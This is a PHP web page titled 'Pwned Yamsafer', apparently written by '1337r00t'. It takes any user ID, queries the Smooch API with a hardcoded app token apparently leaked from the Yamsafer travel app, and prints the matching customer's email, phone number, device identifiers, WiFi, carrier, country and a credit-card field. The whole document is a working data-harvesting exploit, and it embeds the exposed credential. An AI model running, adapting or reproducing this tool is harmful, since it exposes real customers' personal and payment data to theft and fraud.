Pwned Yamsafer

1. <title>Boom Yamsafer :)</title>
2. <link rel="shortcut icon" href="https://lh3.googleusercontent.com/ZJbw3ffeHp-QRVprQuni8ZVQiewxW-ZHWKtQ48GgYveKl3Uxc9ONOLmsXhXH8p0gbAs=w300" type="image/x-icon" />
3. <style type="text/css">
4. html {
5.         background: url(https://cdn-d4d.kxcdn.com/wp-content/uploads/2015/07/hacker_wallpapers-1.jpg) no-repeat center center fixed;
6.         -webkit-background-size: cover;
7.         -moz-background-size: cover;
8.         -o-background-size: cover;
9.         background-size: cover;
10. }
11. </style>
12. <style>
13. input[type=text] {
14.     padding:5px;
15.     border:2px solid #ccc;
16.     -webkit-border-radius: 5px;
17.     border-radius: 5px;
18. }
19.  
20. input[type=text]:focus {
21.     border-color:#333;
22. }
23.  
24. input[type=submit] {
25.     padding:5px 15px;
26.     background:#ccc;
27.     border:0 none;
28.     cursor:pointer;
29.     -webkit-border-radius: 5px;
30.     border-radius: 5px;
31. }
32. </style>
33. <center>
34. <img src="https://lh3.googleusercontent.com/ZJbw3ffeHp-QRVprQuni8ZVQiewxW-ZHWKtQ48GgYveKl3Uxc9ONOLmsXhXH8p0gbAs=w190">
35. <br><br><br>
36. <form method="POST" action="">
37. <font color="red">ID : </font><input name="id" type="text">
38. <br><br>
39. <input type="submit" value="Get Info :)">
40. </center>
41. </form>
42. <?
43. $id = $_POST['id'];
44. $musafer = curl_init();
45. curl_setopt($musafer, CURLOPT_URL, "https://api.smooch.io/v1/appusers/$id");
46. curl_setopt($musafer, CURLOPT_SSL_VERIFYPEER, false);
47. curl_setopt($musafer, CURLOPT_RETURNTRANSFER, 1);
48. curl_setopt($musafer, CURLOPT_FOLLOWLOCATION, 1);
49. curl_setopt($musafer, CURLOPT_HTTPHEADER, array(
50.     'Host: api.smooch.io',
51.     'app-token: c6inoghjz10wyzn73sdwotxfe'
52.     ));
53. curl_setopt($musafer, CURLOPT_HEADER, 1);
54. $checked = curl_exec($musafer);
55. if(eregi('"appName":"Yamsafer"', $checked))
56.     {
57.         ####################################################################################################
58.         $startemail = explode('","email":"' , $checked );
59.         $endemail = explode('","' , $startemail[1] );
60.         $email = $endemail[0];
61.         //////////////////////////////////////////////////
62.         $startid = explode('","userId":"' , $checked );
63.         $endid = explode('","' , $startid[1] );
64.         $id = $endid[0];
65.         /////////////////////////////////////////////////
66.         $startlast = explode('"lastSeen":"' , $checked );
67.         $endlast = explode('","' , $startlast[1] );
68.         $last = $endlast[0];
69.         /////////////////////////////////////////////////
70.         $startuu = explode('"devices":[{"id":"' , $checked );
71.         $enduu = explode('","' , $startuu[1] );
72.         $UUID = $enduu[0];
73.         /////////////////////////////////////////////////
74.         $startwifi = explode('"info":{"wifi":"' , $checked );
75.         $endwifi = explode('","' , $startwifi[1] );
76.         $wifi = $endwifi[0];
77.         /////////////////////////////////////////////////
78.         $startos = explode('","os":"' , $checked );
79.         $endos = explode('","' , $startos[1] );
80.         $os = $endos[0];
81.         /////////////////////////////////////////////////
82.         $startinstall = explode('"installer":"' , $checked );
83.         $endinstall = explode('","' , $startinstall[1] );
84.         $installer = $endinstall[0];
85.         /////////////////////////////////////////////////
86.         $startdevice = explode('"devicePlatform":"' , $checked );
87.         $enddevice = explode('","' , $startdevice[1] );
88.         $device = $enddevice[0];
89.         /////////////////////////////////////////////////
90.         $startcarrier = explode(',"carrier":"' , $checked );
91.         $endcarrier = explode('","' , $startcarrier[1] );
92.         $carrier = $endcarrier[0];
93.         /////////////////////////////////////////////////
94.         $startphone = explode('"phone":"' , $checked );
95.         $endphone = explode('","' , $startphone[1] );
96.         $phone = $endphone[0];
97.         /////////////////////////////////////////////////
98.         $startcard = explode('"credit_card":' , $checked );
99.         $endcard = explode(',"' , $startcard[1] );
100.         $card = $endcard[0];
101.         /////////////////////////////////////////////////
102.         $startcountry = explode('"country":"' , $checked );
103.         $endcountry = explode(',"' , $startcountry[1] );
104.         $country = $endcountry[0];
105.         /////////////////////////////////////////////////
106.         $startcurrent = explode('"current_user_currency":"' , $checked );
107.         $endcurrent = explode('"' , $startcurrent[1] );
108.         $current = $endcurrent[0];
109.         ####################################################################################################
110.         echo '<center><font color="green">
111.         Email: '.$email.' <br>
112.         ID: '.$id.' <br>
113.         LastLogin : '.$last.' <br>
114.         UUID: '.$UUID.' <br>
115.         WiFi: '.$wifi.' <br>
116.         OS: '.$os.' <br>
117.         Installed By: '.$installer.' <br>
118.         Device: '.$device.' <br>
119.         Carrier: '.$carrier.' <br>
120.         Phone: '.$phone.' <br>
121.         Credit Card: '.$card.' <br>
122.         Country: '.$country.' <br>
123.         Currency : '.$current.' <br>
124.         </font></center>';
125.     }
126.     else
127.     {
128.         if(eregi('{"error":{"code":"user_not_found","description":"User not found"}}', $checked))
129.             {
130.                 echo "<center><font color='red'>Not Found User :(</font></center>";
131.             }
132.             else
133.             {
134.                 echo '<script>alert("Discovered & Coded By 1337r00t ")</script>';
135.                 echo "<center><font color='blue'>Input Any ID :)</font></center>";
136.             }
137.     }
138. curl_close($musafer);
139. ?>